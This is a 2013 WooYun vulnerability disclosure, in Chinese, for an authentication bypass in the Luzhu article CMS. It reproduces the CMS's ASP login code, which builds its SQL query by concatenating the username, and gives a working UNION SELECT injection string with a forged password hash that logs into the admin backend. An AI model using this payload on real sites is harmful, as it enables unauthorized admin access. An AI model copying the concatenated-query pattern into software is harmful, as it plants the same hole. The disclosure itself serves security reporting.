当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034874

漏洞标题:露珠文章管理系统后台权限绕过

相关厂商:露珠文章管理系统

漏洞作者: My5t3ry

提交时间:2013-08-21 12:22

修复时间:2013-11-19 12:23

公开时间:2013-11-19 12:23

漏洞类型:非授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-11-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

露珠CMS对获取参数处理不当,导致权限绕过。

详细说明:

代码如下:

<!--#include file="conn.asp"-->
<link rel="stylesheet" href="adminimages/admin.css" type="text/css">
<%htwjm="admin.asp"
Server.ScriptTimeOut=99999
select case request("luzhuba")
'case "":login()
case "login":login()
case "loginsave":loginsave()
case "scazwj":scazwj()
end select
Public Sub login
Response.Write("<style type=text/css>")
Response.Write("body  { background:#799AE1; font:Verdana 12px;")
Response.Write("}")
Response.Write("</style>")
Response.Cookies("luzhubaht")("id") = ""
Response.Cookies("luzhubaht")("mm") =""
Response.Cookies("luzhubaht")("xm") = ""
Response.Cookies("luzhubaht")("sj") = ""
session("luzhubahydj")=""
dim num1
dim rndnum
Randomize
Do While Len(rndnum)<4
num1=CStr(Chr((57-48)*rnd+48))
rndnum=rndnum&num1
loop
session("fjm")=rndnum
sql="SELECT  * FROM wzxx "
set rs=server.createobject("adodb.recordset")
rs.open sql,conn,1,1
wzxx=rs("wzm")
if rs("zcqk")<>1 then
luzhubaErr = True
luzhuba_cn("<script language=javascript>alert('对不起,此程序不能使用!');this.location.href='index.asp';</script>")
If luzhubaerr = True Then Exit Sub
end if
rs.close
Response.Write("<title>"&wzxx&"后台管理</title>")
Response.Write("<meta http-equiv='Content-Type' content='text/html; charset=gb2312'>")
Response.Write("<meta name='keywords' content="&wzxx&"/>")
Response.Write("<br><br><br><form action=""?luzhuba=loginsave"" method=post>")
Response.Write("<form action=""?luzhuba=loginsave"" method=post>") 
Response.Write("<table width=""413"" border=""0"" align=""center"" cellpadding=""0"" cellspacing=""0"" bgcolor=""#EEEAD6"">")
Response.Write("<tr>")
Response.Write("<td height=""29"" colspan=""3"" background=""adminimages/topbg.gif""> <table width=""95%"" align=""right"" border=""0"" cellspacing=""0"" cellpadding=""0"">")
Response.Write("<tr><td align=""left"" valign=""middle""><font color=""#FFFFFF""><B>"&wzxx&"后台管理入口</B></font></td>")
Response.Write("<td width=""8%"" align=""right""><a href=""#"" onclick=""javascript:window.open('说明.txt','','width=640,height=300,left=100,top=10,scrollbars=yes')""><img src=""adminimages/help.gif"" align=""middle"" border=""0"" alt=""帮助文档""></a>&nbsp;</td>")
Response.Write("</tr></table></td></tr><tr>")
Response.Write("<td width=""3"" background=""adminimages/link.GIF""></td>")
Response.Write("<td><table width=""100%"" border=""0"" cellspacing=""0"" cellpadding=""0"">")
Response.Write("<tr><td height=""75"" background=""adminimages/bgtop.gif"" >")
Response.Write("<table width=""100%"" height=""64"" border=""0"" cellpadding=""0"" cellspacing=""0"">")
Response.Write("<tr><td width=""30%"" align=""left"" valign=""middle"" height=""46"" style=""font-size: 16px;""> <B><font color=""#FFFFFF"">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "&wzxx&"</font></B> ") 
Response.Write("<font color=""#FFFFFF""><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ") 
Response.Write("</b></font> </td></tr><tr><td width=""30%"" align=""left"" valign=""middle"" height=""18""> <font color=""#FFFFFF""><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ") 
Response.Write("----因为我们专业,所以更出色!") 
Response.Write("</b></font> </td></tr></table></td></tr><tr>")
Response.Write("<td><table width=""95%"" border=""0"" align=""center""><tr><td>")
Response.Write("<fieldset><legend accesskey=""F"" align=""left"">登陆窗口</legend> ")
Response.Write("<table width=""100%"" border=""0"" cellspacing=""2"" cellpadding=""2""><tr> ")
Response.Write("<td width=""10%"">&nbsp;</td><td width=""20%"">用&nbsp;户&nbsp;名:</td>")
Response.Write("<td><input type=""text"" name=""name"" size=""18"" ></td>")
Response.Write("</tr><tr><td width=""10%"">&nbsp;</td><td width=""20%"">密&nbsp;&nbsp;&nbsp;&nbsp;码:</td>")
Response.Write("<td><input type=""password"" name=""password"" size=""19"" value="""&Request.Cookies("luzhubajsq")("pass")&"""></td></tr>")
Response.Write("<tr><td width=""10%"">&nbsp;</td><td>附&nbsp;加&nbsp;码:</td>")
Response.Write("<td><input type=""text"" name=""fjm"" size=""10"" value="""&rndnum&"""> &nbsp;输入附加码<span style=""background-color: #D0D0BF;line-height:200%""><font color=#000000>"&rndnum&"</font></span> ")    
Response.Write("</td></tr><tr><td colspan=""3"" align=""center""><input type=""submit"" name=""submit"" value="" 登 陆 "" class=""tbutton""></td>")
Response.Write("</tr></table></fieldset>&nbsp;</td></tr></table></td></tr></table></td><td width=""3"" background=""adminimages/link.GIF""></td>")
Response.Write("</tr><tr><td height=""3"" background=""adminimages/linkbom.GIF"" colspan=""3""></td></tr></table>")  
Response.Write("<input type=""hidden"" value=""CheckLogin"" name=""method""></form>")
end sub
Public Sub scazwj
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile request.ServerVariables("APPL_PHYSICAL_PATH")&"setup.asp"
Set fso = nothing
response.redirect "?luzhuba=login" 
end sub
Public Sub loginsave
name=request.form("name")  
exec="select * from admin where name = '"+name+"' "         
set rs=server.createobject("adodb.recordset")             
rs.open exec,conn,1,3 
if rs.eof and rs.bof then
Response.Write("<script language=javascript>alert('对不起,您不是管理员,请您离开!');this.top.location.href='index.asp';</script>")
else
if  rs("password")=md5(Trim(request.form("password")),16)    then 
if request.form("fjm")<>session("fjm") then
Response.Write("<script language=javascript>alert('附加码不对!');this.top.location.href='?luzhuba=login';</script>")
else
Session("a")=rs("a")
session("luzhubahydj")=4
Response.Cookies("luzhubaht")("id")= rs("id")
Response.Cookies("luzhubaht")("mm") =rs("password")
Response.Cookies("luzhubaht")("xm") = rs("name")
response.redirect ""&htwjm&"?luzhuba="  
end if
else
Response.Write("<script language=javascript>alert('密码错误!');this.top.location.href='?luzhuba=login';</script>")
end if 
end if
rs.close             
set rs=nothing             
conn.close             
set conn=nothing             
end sub
%>

漏洞证明:

访问:
http://192.168.116.130/admin_login.asp?luzhuba=login
输入用户名:
' union select '1 or 1=1',2,'c0f1b6a831c399e2','100' from admin where '1'='1
密码:a
即可登陆后台。

修复方案:

过滤,你懂的。。

版权声明:转载请注明来源 My5t3ry@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝